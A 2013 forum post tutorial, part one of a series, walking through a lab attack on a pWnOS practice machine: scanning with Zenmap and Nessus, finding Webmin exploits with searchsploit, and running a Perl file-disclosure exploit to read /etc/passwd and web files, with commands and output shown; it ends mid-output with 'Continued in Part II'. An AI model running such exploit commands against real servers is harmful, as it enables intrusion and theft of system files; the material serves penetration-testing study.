1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

TUTORIAL - Privilege Escalation; Part I

Discussion in 'Privilege Escalation' started by Witranx, Apr 1, 2013.

  1. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    1. Information Gathering Step

    A. Using Zenmap

    Out IP target is 192.168.0.21
    [​IMG]
    We have known the running service sssh, http, and netbios
    B. Open our taeget via web browser
    Because the http service is running we will try to open it via browser
    [​IMG]
    We can try to follow how the web site work.
    [​IMG]
    [​IMG]
    The try to change the GET parameter. In this case we change the "true" parameter in address bar. and the error message is appeared.
    [​IMG]
    From the error message, we have know that the file of this web is placed in var/www/ and the name of this file is index1.php.
    2. Service Enumeration Step
    From the Zenmap we have known the running service and the port that have used. We can get dept info about the service by using Nessus.
    Fill the IP address of the target and choose the Internal Network Scan for intranet target.
    [​IMG]
    We have known the running service and the vulnerability level. For the detail we can click the service..​
    [​IMG]
    [​IMG]
    3. Vulnerability Assesment
    From the detail we can analyze the vulnerability of the service. After that, we can choose and try to exploit it. In ths case we choose the port 10000 / http for exploiting.
    From the detail we can know that the webmin version used is before 1.296 and the usermin is below 1.226.
    4. Exploit using exploitdb
    Open it via K-menu - Apps - Exploitation Tool - Open Source Exploitation - Exploitdb - expoitdb directory.
    Then search the exploitation script from the database by typing ./searchsploit webmin. We can use the following script for the exploitation.
    root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
    Description Path
    --------------------------------------------------------------------------- -------------------------
    Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
    Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
    Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    Because our target vulnerability is in webmin application and the version is below 1.296 we can try for the following script..
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
    In this case we try to use Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl to get username in our Linux application target.
    To use this script we can type perl 2017.pl

    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
    Usage: 2017.pl <url> <port> <filename> <target>
    TARGETS are
    0 - > HTTP
    1 - > HTTPS
    Define full path with file name
    Example: ./webmin.pl blah.com 10000 /etc/passwd
    We have known how to use it by typing perl 2017.pl <url> <port> <filename> <target>
    We can type based on our target perl 2017.pl 192.168.0.21 10000 /etc/passwd 0. Our IP target is 192.168.0.21 and the port target is 10000.
    With this script we can view file target in our computer..
    Now we can try to view web application file in /var/www/
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/
    FILE CONTENT STARTED
    -----------------------------------
    <HTML>
    <body>
    <center><h1>Welcome to the pWnOS homepage!
    </h1></center>
    <p>This is the help page. If you would like help, click the next button below.</p>
    <p>
    <button style="width:65;height:65" onClick="window.location='index1.php?help=true&connect=true'"><b>Next</b></button>
    </p>
    -------------------------------------
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index2.php 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/index2.php
    ....Continued in Part II
     
    #1
    Carlito likes this.
  2. global93

    global93 New Member

    Joined:
    Dec 11, 2016
    Messages:
    2
    Likes Received:
    0
    up top
     
    #2

Share This Page